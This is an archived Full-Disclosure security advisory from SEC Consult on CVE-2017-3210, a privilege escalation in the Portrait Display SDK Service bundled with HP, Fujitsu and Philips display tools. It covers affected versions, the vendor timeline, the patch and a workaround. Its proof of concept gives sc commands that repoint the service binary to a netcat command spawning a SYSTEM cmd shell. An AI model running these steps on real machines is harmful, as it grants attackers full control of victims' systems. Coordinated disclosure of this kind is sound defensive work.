lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <58FF8DB5.7030907@sec-consult.com>
Date: Tue, 25 Apr 2017 19:56:05 +0200
From: SEC Consult Vulnerability Lab <research@...-consult.com>
To: <bugtraq@...urityfocus.com>, <fulldisclosure@...lists.org>
Subject: [FD] SEC Consult SA-20170425-0 :: Portrait Display SDK Service
 Privilege Escalation

SEC Consult Vulnerability Lab Security Advisory < 20170425-0 >
=======================================================================
              title: Privilege Escalation due to insecure service configuration
            product: Portrait Display SDK Service
 vulnerable version: mutliple, see PoC
      fixed version: multiple, see solution
         CVE number: CVE-2017-3210
             impact: critical
           homepage: http://www.portrait.com/
              found: 2017-02-23
                 by: W. Schober (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"For nearly 20 years, Portrait Displays has provided customized software to
OEM monitor manufacturers across the globe. We develop tailored solutions,
encompassing the needs of today’s changing marketplace.

Our technologies allow OEMs to provide their end users with a premium
interactive experience. Our engineers work hand-in-hand with leading OEMS,
ODMs, and GPU and scaler companies, to develop and implement cutting-edge
software solutions."

Source: http://www.portrait.com/technology.html


Business recommendation:
------------------------
SEC Consult recommends not to use this service in a production environment
until a thorough security review has been performed by security professionals
and all identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
The Portrait Display SDK Service (PdiService.exe) configuration was found to
be writable for every authenticated user in a default installation. This would
allow an attacker to execute arbitrary code, elevate his privileges and gain a
shell with the privileges of the SYSTEM user.

The Portrait Display SDK Service is used in various different OEM software,
which is shipped per default on a wide range of notebooks. The software, where
the SDK is included is used as an virtual OSD (On Screen Display) for "tuning"
displays, setting gamma values, changing color values etc.

The vulnerability was identified in the software "DisplayView Click" from
Fujitsu. Due to the fact, that this SDK is used in several software packages,
SEC Consult tried to identify other potential vulnerable software packages,
which got rebranded by Portrait Displays, Inc. The following list contains an
excerpt of packages containing the SDK, which are partially installed per
default on
notebooks of HP, Philips,Fujitsu, etc.


-) Fujitsu DisplayView Click v5
-) Fujitsu DisplayView Click v6
-) HP Display Assistant
-) HP Display Control
-) HP Mobile Display Assistant v1
-) HP Mobile Display Assistant v2
-) HP My Display
-) HP My Display All-In-One/TouchSmart
-) HP Picture in Picture
-) Philips SmartControl II
-) Philips SmartControl Lite
-) Philips SmartControl Premium


Portait Displays Inc. confirmed that at least the following packages are
vulnerable:

Fujitsu DisplayView Click
Version 6.0 build id: dtune-fts-R2014-04-22-1630-07, 6.01
build id:  dtune-fts-R2014-05-13-1436-35
The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51

Fujitsu DisplayView Click Suite  Version 5
build id: dtune-fus-R2012-09-26-1056-32
The issue is addressed by patch in Version 5.9 build id:
dtune-fus-R2017-04-01-1212-32

HP Display Assistant  Version 2.1
build id: dtune-hwp-R2012-10-31-1329-38
The issue was fixed in Version 2.11 build id:  dtune-hwp-R2013-10-11-1504-22
and above

HP My Display  Version 2.01
build id: dtune-hpc-R2013-01-10-1507-17
The issue was fixed in Version 2.1 build id:  dtune-hpc-R2014-06-27-1655-15 and
above

Philips Smart Control Premium
Versions with issue: 2.23 build id: dtune-plp-R2013-08-12-1215-13, 2.25
build id: dtune-plp-R2014-08-29-1016-05
The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07

Furthermore, a more detailed summary of this advisory has been published at our
blog:
http://blog.sec-consult.com/2017/04/what-unites-hp-philips-and-fujitsu-one.html

Proof of concept:
-----------------
To identify the permissions of the service the builtin Windows command "sc" was
used. The output of the command for the vulnerable service can be seen below:

  (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
  (A;;CCLCSWRPWPDTLOCRRC;;;SY)
  (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
  (A;;CCLCSWLOCRRC;;;IU)
  (A;;CCLCSWLOCRRC;;;SU)

By "converting" the Security Descriptor Definition Language into human readable
words, SEC Consult was able to identify the following permissions for the
PdiService:

  RW NT AUTHORITY\Authenticated Users
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
  R  NT AUTHORITY\INTERACTIVE
  R  NT AUTHORITY\SERVICE

Due to the fact, that every authenticated user has write access on the service,
an attacker is able to execute arbitrary code by changing the services binary
path. Moreover, all Windows services are executed with SYSTEM permissions,
resulting in privilege escalation.

The workflow to execute arbitrary code is as follows:
1) Stop Service
   sc stop pdiservice
2) Alter service binary path
   sc config pdiservice binpath= "C:\nc.exe -nv 127.0.0.1 4242 -e
C:\WINDOWS\System32\cmd.exe"
3) Start Service
   sc start pdiservice


Vulnerable / tested versions:
-----------------------------
The following list contains all vulnerable versions:

Fujitsu DisplayView Click
Version 6.0 build id: dtune-fts-R2014-04-22-1630-07, 6.01
build id:  dtune-fts-R2014-05-13-1436-35
The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51

Fujitsu DisplayView Click Suite  Version 5
build id: dtune-fus-R2012-09-26-1056-32
The issue is addressed by patch in Version 5.9 build id:
dtune-fus-R2017-04-01-1212-32

HP Display Assistant  Version 2.1
build id: dtune-hwp-R2012-10-31-1329-38
The issue was fixed in Version 2.11 build id:  dtune-hwp-R2013-10-11-1504-22
and above

HP My Display  Version 2.01
build id: dtune-hpc-R2013-01-10-1507-17
The issue was fixed in Version 2.1 build id:  dtune-hpc-R2014-06-27-1655-15 and
above

Philips Smart Control Premium
Versions with issue: 2.23 build id: dtune-plp-R2013-08-12-1215-13, 2.25
build id: dtune-plp-R2014-08-29-1016-05
The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07


Vendor contact timeline:
------------------------
2017-03-01: Contacting vendor through email sales@...trait.com
2017-03-01: Informing CERT/CC, asking for coordination support regarding HW
            vendors, assigned VU#219739
2017-03-01: The vendor responds and requests all attachments as plaintext in
            the email body because they are not allowed to open any attachements
            from "unknown parties".
            Therefore SEC Consult sends the PGP Public Keys as plaintext in the
            body of the email.
2017-03-08: Contacting vendor again on how to transmit the advisory; no answer
2017-03-15: Informing CERT/CC about the status, asking for support to contact
            the vendor
2017-03-16: The Vendor provides a public key for encrypted communication;
            The advisory got securely transmitted to the vendor.
2017-03-18: The vendor responds and confirms that they were able to reproduce
            the vulnerability. Detailed information, on which Brands are
            affected, as well as a timeline for an update will be provided next
            week.
2017-03-28: Requesting update from Portrait Displays Inc. Asking about current
            state and a list of affected vendors.
2017-03-29: Vendors responds that they are still in the process of evaluating
            on, which 3rd parties are affected.
2017-04-06: Vendor updates us with information about the planed release schedule
            and affected vendors.  Portrait is still in the progress of
            evaluating on, which3rd parties are affected. The list should be
            available at the end of the week. A patch that removes the invalid
            permission will be available on the vendors website.
2017-04-17: Vendor provides us with a detailed list of affected products.
2017-04-18: Vendor publicly releases a patch for the vulnerability on their
            website (http://www.portrait.com/securityupdate.html)
2017-04-21: SEC Consult requests a CVE from CERT/CC and coordinates the
            disclosure of the CERT VU and the SEC Consult advisory.
2017-04-25: Public release.

Solution:
---------
Since the 18th of April 2017 a patch is available.
See: http://www.portrait.com/securityupdate.html

Workaround:
-----------
To quickly get rid of the vulnerability, the permissions of the service should
be altered with the built-in windows command "sc". To completely remove the
permissions of the "Authenticated Users" group, the following command can be
used:

sc sdset pdiservice
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)

This will result in the following set of permissions:
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
  R  NT AUTHORITY\INTERACTIVE
  R  NT AUTHORITY\SERVICE


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF W. Schober / @2017


Download attachment "signature.asc" of type "application/pgp-signature" (820 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ